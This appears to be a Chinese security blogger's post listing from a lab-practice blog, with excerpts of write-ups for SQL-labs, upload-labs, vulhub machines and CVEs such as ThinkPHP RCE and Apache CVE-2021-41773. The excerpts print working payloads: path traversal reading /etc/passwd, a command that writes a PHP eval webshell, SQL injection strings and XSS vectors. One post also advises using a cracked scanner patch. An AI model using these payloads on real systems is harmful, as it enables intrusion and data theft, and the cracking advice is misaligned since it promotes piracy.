自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(48)
  • 收藏
  • 关注

原创 awvs使用流程

3.点击targets,然后点击 Add targets。4.这里使用我的pikachu靶场测试扫描。2.去网上找一个破解补丁包然后就进来了。6.点击targets,再点击scan。8.等到扫描结束会生成一份报告。1.安装好后进行登录。9.如图可以找到报告。

2024-09-25 17:23:52 325

原创 JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞

此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。

2024-09-23 18:29:23 356

原创 Shiro rememberMe反序列化漏洞(Shiro-550)

反弹shell。

2024-09-23 17:23:53 215

原创 spring 代码执行(CVE-2018-1273)

(3)进入终端查看,可以看到成功写入。(1)填写注册信息,burp抓包。

2024-09-23 17:23:04 284

原创 Spring Data Rest 远程命令执行命令(CVE-2017-8046)

返回kali 输入命令进docker入容器 ls /tmp查看 可以发现 成功创建success。

2024-09-23 17:22:21 485

原创 S2-057远程执⾏代码漏洞

{

2024-09-23 17:21:46 485

原创 Thinkphp(TP)

index.php??>' >1.php。

2024-09-23 17:19:41 797

原创 Apache CVE-2021-41773 漏洞攻略

docker pull blueteamsteve/cve-2021-41773:no-cgiddocker run -d -p 8080:80 97308de4753dcurl http://192.16.10.190:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

2024-09-22 16:32:07 283

原创 jboss

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞。

2024-09-22 16:21:10 1605

原创 weblogic

然后一直下一步。

2024-09-22 15:04:56 1676

原创 Tomcat靶场攻略

将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war。

2024-09-22 13:21:13 549

原创 aspcms webshell漏洞复现

(65)))%25><%25 密码是a。

2024-09-17 14:07:27 465

原创 dedecms靶场(四种webshell姿势

一。通过文件管理器上传WebShell1.登陆到后台点击核心-》文件式管理器-》文件上传 将准备好的一句话木马上传2.点击访问然后蚁剑连接二。修改模板文件拿WebShell1.点击-》模板-》默认模板管理-》index.htm-》修改在文件修改中添加一句话木马2.点击-》生成-》更新主页HTML-》将主页位置修改为./index.php】点击 -》生成静态-》更新主页HTML,再次访问站点首页可发现变化.3.蚁剑连接三。后台任意命令执行拿We

2024-09-17 13:48:06 599

原创 seafaring寻找漏洞

(1)下面有一个输入框,输入ls进行查看(2)输入echo '<??>' > qxl.php 并且访问(3)写入一句话木马,并且访问蚁剑连接echo '<??>'>q.php。

2024-09-13 15:29:36 747

原创 sqlgun靶场训练

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #-1' union select 1,group_concat(id,admin,pas

2024-09-13 14:36:40 693

原创 Vulnhub-RickdiculouslyEasy靶机攻略

御剑扫描到ip。

2024-09-11 17:04:31 1178

原创 vulhub Thinkphp5 2-rce远程代码执行漏洞

192.168.33.162:8080?s=/Index/index/L/${@phpinfo()}192.168.33.162:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}

2024-09-08 14:47:31 240

原创 vulhub GhostScript 沙箱绕过(CVE-2018-16509)

vulhub/ghostscript/CVE-2018-16509/poc.png at master · vulhub/vulhub · GitHub

2024-09-08 14:35:36 211

原创 vulhub ThinkPHP5 5.0.23远程代码执行漏洞

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php

2024-09-08 14:08:11 419

原创 代码执行漏洞-Log4j2漏洞

反弹Shell-base64加密。

2024-09-08 13:49:15 360

原创 中间件解析漏洞

(1)在iis的网站根目录新建一个x.asp文件(2)在x.asp中新建⼀个jpg⽂件。内容为 asp代码。(3)在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏(4)将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏.

2024-09-05 18:51:05 514

原创 tomato靶场通关攻略

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。进入antibots中。

2024-09-04 14:44:33 422

原创 文件包含PHP伪协议利用方法

123.php内容使⽤: file:// ⽂件的绝对路径和⽂件名。

2024-09-03 20:09:36 379

原创 pikachu文件包含漏洞靶场

http://www.pikachu.com:90/vul/fileinclude/fi_local.php?filename=../../../shell.txt&submit=%E6%8F%90%E4%BA%A4php.in:allow_url_fopen = onallow_url_include = on

2024-09-03 19:37:15 419

原创 hackme靶机攻略

点击search1' order by 3 --+

2024-09-03 18:04:16 380

原创 SQL-labs靶场(61-65)

?id=1')) and updatexml(1,concat(1,(select database())),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(column

2024-09-02 14:50:44 784

原创 upload-labs靶场通关攻略

3.同时攻击,直到出现webshell.php。

2024-08-31 21:51:43 1206

原创 sql-labs靶场(51-60)

?sort=1' and updatexml(1,concat(1,(select database())),1) --+?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+判断数据库的第一个字符用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问

2024-08-31 16:58:09 632

原创 vulhub xxe靶机

1.访问靶机ip2.网址后面加robot.txt3.网址后面加xxe4.登录抓包放入重放器里5.使用xml 读取靶机中的 /etc/passwd 文件6.接下来通过php伪协议base64加密读 admin.php 源码 ()7.对得到的base64编码进行解码8.解码之后查找账号密码9.将密码进行md5解密10.登录 ip/xxe/admin.php 用刚才得到的用户名 administhebest,密码 admin@123登录。

2024-08-29 19:02:08 363

原创 sql-labs靶场(41-50)

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+?id=-1

2024-08-28 19:50:08 1067

原创 xxs靶场16-20关

<img src=1 onerror=alert('xss')>?arg01=a&arg02=%27%20onmouseover=alert("aini")

2024-08-28 19:03:24 551

原创 gethub-rrsf

由于一句话木马无法写入,所以我们使用base64编码,然后在进行解码输出保存到shell.php中。

2024-08-28 14:41:29 628

原创 sql-labs靶场36-40关

?id=1%df' order by 4--+?id=1%df' order by 3--+?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where t

2024-08-27 18:11:16 1028

原创 gethub-rrsf通关攻略

查看页面源代码提交flag。

2024-08-27 16:56:40 497

原创 sql注入靶场31-35关

?id=0") union select 1,2,3--+&&id=2?id=1&&id=0") union select 1,2,3 --+?id=1&&id=0" union select 1,database(),3 --+?id=1&&id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+?id=1&&id=0' union sel

2024-08-26 19:42:03 719

原创 sql-labs靶场通关攻略(26-30)

接下来使用联合查询就好了。

2024-08-24 19:19:27 1247

原创 xxs-labs通关攻略

包含外部的html文件?那这么说我把第一关的网址试一下尖括号被屏蔽了,而且我们不能构造出onclick等时间,因为没人点,但是我们可以构造个img,然后onerror方法,尝试一下。

2024-08-24 16:17:49 750

原创 pikache靶场通关——XSS漏洞

alert("cookie值是:"+1);

2024-08-22 20:23:57 477

原创 sql-labs靶场21-25关

aaa')

2024-08-22 18:07:59 1124

原创 各种数据库注入

(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?Order by是数据库查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。

2024-08-20 19:53:31 834

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除